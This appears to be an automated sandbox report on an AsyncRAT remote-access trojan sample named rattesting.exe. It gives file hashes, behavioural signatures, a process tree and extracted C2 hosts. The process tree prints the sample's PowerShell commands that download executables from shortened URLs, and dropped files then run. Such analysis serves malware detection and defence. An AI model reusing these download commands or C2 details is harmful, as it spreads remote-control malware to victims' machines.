Overview

overview

10

Static

static

3

rattesting.exe

windows7-x64

10

rattesting.exe

windows10-2004-x64

10

Resubmissions

22-07-2024 10:21

240722-mdl5gashqm 10

Analysis

  • max time kernel
    23s
  • max time network
    24s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-07-2024 10:21

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    rattesting.exe

  • Size

    309KB

  • MD5

    6940553fce65b288660a664eb039ffe2

  • SHA1

    8687dc9a6dc0f4b65035bcc76a5e6785eedf66e1

  • SHA256

    d4bc343f7ecdf7008db9c9c71b1d8e275051f24c3dc64b1353a32fcd0e92782f

  • SHA512

    044430fecd45f6119bf06c1ad4a3e7cd02464f579bd901ee883f12c05429812d0181b2fdf918db8a2f0070f7ccec184de0b11ba139a138a48bc45f3508041dc4

  • SSDEEP

    6144:z8JsLcpjzTDDmHayakLkrb4NSarQW82X+t40X9U:IzxzTDWikLSb4NS7t2X+t40X9U

Score
10/10
asyncratdefaultexecutionrat

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://tinyurl.com/m58snm44

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://tinyurl.com/yc3v5z49

Extracted

Family

asyncrat

Botnet

Default

C2

127.0.0.1:7620

matter-ivory.gl.at.ply.gg:7620
Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Async RAT payload 1 IoCs
    rat
  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\rattesting.exe
    "C:\Users\Admin\AppData\Local\Temp\rattesting.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:344
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\rattesting.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3836
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://tinyurl.com/m58snm44', 'file.exe
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4440
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://tinyurl.com/yc3v5z49', 'le.exe')"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3932
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\le.exe
        le.exe
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:2012
        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\Infected.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Infected.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:2008

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
    Filesize

    1KB

    MD5

    28854213fdaa59751b2b4cfe772289cc

    SHA1

    fa7058052780f4b856dc2d56b88163ed55deb6ab

    SHA256

    7c65fe71d47e0de69a15b95d1ee4b433c07a1d6f00f37dd32aee3666bb84a915

    SHA512

    1e2c928242bdef287b1e8afe8c37427cfd3b7a83c37d4e00e45bcbaa38c9b0bf96f869a062c9bc6bb58ecd36e687a69b21d5b07803e6615a9b632922c1c5ace4

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    14KB

    MD5

    6ac0de349dec22db65ca4ebf409b5760

    SHA1

    d6b38bbb23fb3c062a0bffa8b372d37b5323999c

    SHA256

    729579b140bd77db5e18b4ef5fcfd5a616516349985f8c18a838d2448551bf20

    SHA512

    adcc9af89cef85a7cdf4b973b31e9fe87f333d89d9fbd5921b759eeb09ecde742739d8cb0ce3a4ddeca3cb9701b82ab0227c5a855d9840f614f2210dd9f58851

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\le.exe
    Filesize

    337KB

    MD5

    dbe710354bababe1dcae3c50bac53e1b

    SHA1

    9041128198280b7d23495e4cd87f5dce1c3148a5

    SHA256

    75a000fc84f6fe726d74ecd731667b035d4582bf327e6d493854e7cd2426eccd

    SHA512

    950ce5b06bffc34f69549925c2b7b40fa6155920201791efa97a5cdbaa305f14adcd906dc93b6e9797d20f29fd394a1d57db2a3cf9f643e329eb854f09ccad45

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\rattesting.bat
    Filesize

    287B

    MD5

    e072208f0724637156d508b89db54154

    SHA1

    ba65e528c56726d34e123bced6d6a3cd26e2cf0a

    SHA256

    29d168033c119e30aa7939abb96631d2714fb1051d4a25369074047abcca6fda

    SHA512

    0fabd9faeab61048e7adbcfb9c76b841640a17f26fed512bea0f29222a8a5fe8667eb023c171c3b14735fda000c021e4cdd157f7fcd0cddef917d77adae9be17

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\Infected.exe
    Filesize

    63KB

    MD5

    443839fb3524964b6c933d7db3adaa2d

    SHA1

    b546ecb5afc2417a75df4f7bc327a0d7cfb7f43f

    SHA256

    0edc71223f931255d1611bce6f5a7ff6b671e44a5eae5a8caf15f0db76e58195

    SHA512

    10786e5f2c6032d61bd59b491145f1bc399c6902c9bc707e4ad934e4899a82cc1c18e45267bffd4f9fe9fef468d1c6e1939664755047fd5e855a279468c102d8

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hchquiof.cbl.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • memory/2008-63-0x0000000000470000-0x0000000000486000-memory.dmp

    Filesize

    88KB

    Download

  • memory/3932-47-0x0000000072640000-0x0000000072DF0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/3932-44-0x0000000006880000-0x000000000689A000-memory.dmp

    Filesize

    104KB

    Download

  • memory/3932-43-0x0000000007CE0000-0x000000000835A000-memory.dmp

    Filesize

    6.5MB

    Download

  • memory/3932-41-0x0000000005F70000-0x00000000062C4000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/3932-40-0x0000000072640000-0x0000000072DF0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/3932-30-0x0000000072640000-0x0000000072DF0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/3932-29-0x0000000072640000-0x0000000072DF0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4440-17-0x0000000005F60000-0x0000000005FC6000-memory.dmp

    Filesize

    408KB

    Download

  • memory/4440-27-0x0000000072640000-0x0000000072DF0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4440-24-0x00000000065B0000-0x00000000065FC000-memory.dmp

    Filesize

    304KB

    Download

  • memory/4440-23-0x0000000006570000-0x000000000658E000-memory.dmp

    Filesize

    120KB

    Download

  • memory/4440-22-0x00000000060D0000-0x0000000006424000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/4440-15-0x0000000005DE0000-0x0000000005E02000-memory.dmp

    Filesize

    136KB

    Download

  • memory/4440-16-0x0000000005E80000-0x0000000005EE6000-memory.dmp

    Filesize

    408KB

    Download

  • memory/4440-9-0x0000000072640000-0x0000000072DF0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4440-7-0x0000000072640000-0x0000000072DF0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4440-8-0x0000000005630000-0x0000000005C58000-memory.dmp

    Filesize

    6.2MB

    Download

  • memory/4440-6-0x0000000002FB0000-0x0000000002FE6000-memory.dmp

    Filesize

    216KB

    Download

  • memory/4440-5-0x000000007264E000-0x000000007264F000-memory.dmp

    Filesize

    4KB

    Download